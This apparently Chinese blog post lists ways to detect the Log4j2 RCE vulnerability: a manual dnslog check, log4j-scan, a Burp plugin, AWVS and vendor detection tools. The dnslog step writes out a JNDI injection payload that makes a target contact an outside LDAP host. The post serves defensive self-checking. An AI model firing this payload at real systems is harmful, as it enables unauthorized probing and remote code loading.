距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年的时间才能得到解决。所以,在接下来的一段时间里,这个漏洞依然是我们需要去关注的重点。

本文收集和整理了几种漏洞检测方式和工具,以用于Log4j2漏洞检测和自查。

1、dnslog手动验证方法

首先在dnslog平台获取一个子域名,尝试构造payload,插入请求数据包。

${jndi:ldap://bypass.fzuqgl.ceye.io}

通过dnslog平台是否收到请求,初步判断目标环境是否存在漏洞。

2、Log4j-scan

一款用于查找log4j2漏洞的python脚本,支持url检测,支持HTTP请求头和POST数据参数进行模糊测试。

github项目地址:

https://github.com/fullhunt/log4j-scan

3、Log4j2 burp被动扫描插件

通过插件的方式,将lLog4j2漏洞检测能力集成到burp,从而提升安全测试人员的漏洞发现能力。

github项目地址:

https://github.com/f0ng/log4j2burpscanner

Log4j2 burp被动扫描插件效果:

4、AWVS扫描log4j2漏洞

AWVS14最新版本支持Log4j2漏洞检测,支持批量扫描,漏洞扫描神器是不会让你失望的,准备更新武器库吧。

5、制品级Log4j2漏洞检测工具

本检测工具基于腾讯安全的binAuditor,支持 Jar/Ear/War包上传,一键上传即可获取到检测结果。

检测地址:

https://bsca.ms.qq.com/

Jar包检测结果:

6、Log4j2 本地检测工具

基于长亭牧云产品提取出来的Log4j2本地检测工具,可快速发现当前服务器存在风险的 log4j2 应用。

Log4j2 漏洞检测工具地址:

https://log4j2-detector.chaitin.cn/

7、360 Log4j2检测工具包

浏览器被动式扫描+本地检测工具,提供了一个完整的Log4j2漏洞检测方案,另外,工具包还包含了Log4j2补丁方案,如下图:

Log4j2 漏洞检测工具清单相关推荐

  1. 北大软件“软件成分分析与漏洞检测工具”(CoBOT—SCA)正式发布

    根据全球知名IT研究与顾问咨询公司Gartner统计,从2010年到2018年软件代码中采用开源框架或组件.第三方库的比例每年以30%的速度增长,大量的软件系统引入开源代码和第三方库,有的系统引用开源 ...

  2. 第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结

     Part1 前言  Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能.目前通用 ...

  3. 文件包含漏洞检测工具fimap

    文件包含漏洞检测工具fimap 在Web应用中,文件包含漏洞(FI)是常见的漏洞.根据包含的文件不同,它分为本地文件包含漏洞(LFI)和远程文件包含漏洞(RFL).利用该漏洞,安全人员可以获取服务器的 ...

  4. Wapiti一款小巧的开源安全测试漏洞检测工具

    Wapiti 是一套 OpenSource 的站点漏洞检测工具,比较特殊的是,它并不依赖特征数据库,也因此扫描的速度相当快,而探测的则是一些共通性问题,或是作者所宣称的未知漏洞.Wapiti 其实是一 ...

  5. python代码检查工具_基于Python3的漏洞检测工具 ( Python3 插件式框架 )

    [TOC] Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection framework based ...

  6. python测验3_基于Python3的漏洞检测工具

    原标题:基于Python3的漏洞检测工具 Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection ...

  7. Metasploit是一款开源的安全漏洞检测工具,

    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的 ...

  8. 科恩二进制静态漏洞检测工具BinAbsInspector

    科恩二进制文件自动化静态漏洞检测工具 腾讯科恩实验室前阵子出了一个二进制静态漏洞检测工具,专注于二进制漏洞扫描,先mark一下,后面写篇文章. 参考文献 "精"准把握静态分析|科恩 ...

  9. android漏洞检测工具,安卓“超级拒绝服务漏洞”分析及自动检测工具

    本帖最后由 公益 于 2015-1-7 18:14 编辑 作者:360捉虫猎手研究员 0xr0ot & Xbalien "超级拒绝服务漏洞"是360安全研究人员近期发现的一 ...

  10. 为什么都在选择IAST作为安全漏洞检测工具

    前言: 1 最近SAP 爆出的软件供应链安全风险事件 ​ 其中的五个高危漏洞如下,均是编码安全漏洞: lCVE-2023-25616代码注入漏洞 lCVE-2023-23857 隐私数据泄露漏洞 lC ...

最新文章

  1. 黄埔大学,选址定了!
  2. 【业界】Facebook的基础AI算法是如何驱动社交网络的发展?
  3. html中实现th标签添加分页,html – 如何在Angular 4中为表添加分页?
  4. TypeScript方法的定义
  5. 让JavaScript像C#一样支持Region
  6. 图文结合,白话 Go 的垃圾回收原理
  7. 【机器学习】对于特征离散化,特征交叉,连续特征离散化非常经典的解释
  8. NET问答: 如何用 C# 计算相对时间 ?
  9. java 轻量级文件数据库_Java:如何创建轻量级数据库微服务
  10. linux losetup命令,losetup命令_Linux losetup 命令用法详解:设定与控制循环(loop)设备...
  11. python实战===生成随机数
  12. Linux中SDIO命令,Linux MMC/SD/SDIO体系结构
  13. python可能导致异常的代码_Python程序可能导致文件系统错误?
  14. 设计主导型思维在商业领域的崛起,将对创意职业产生积极的溢出效应
  15. 《互联网周刊》:华为终端的未来之路
  16. LTE Attach
  17. Windows系统下上架iOSAPP
  18. HTML+CSS基础知识简单版
  19. mac mtu测试_从Mac OS X的命令行设置MTU大小
  20. 群晖 NAS + frp 最新端口

热门文章

  1. [buuctf] crypto全解——85-120(不建议直接抄flag)
  2. 基于Edge插件+格式工厂下载B站上的喜欢视频
  3. 不看绝对后悔的Linux三剑客之awk实战精讲
  4. vite.config 配置文件
  5. Kali Linux工具大全-信息收集
  6. beetlsql使用
  7. 如何将angular-ui-bootstrap的图片轮播组件封装成一个指令
  8. 什么是负边沿触发_边沿触发 - FreeSaber - 博客园
  9. 脉冲触发器和边沿触发器的区别
  10. 信息系统项目管理师必背核心考点(十四)变更管理的工作程序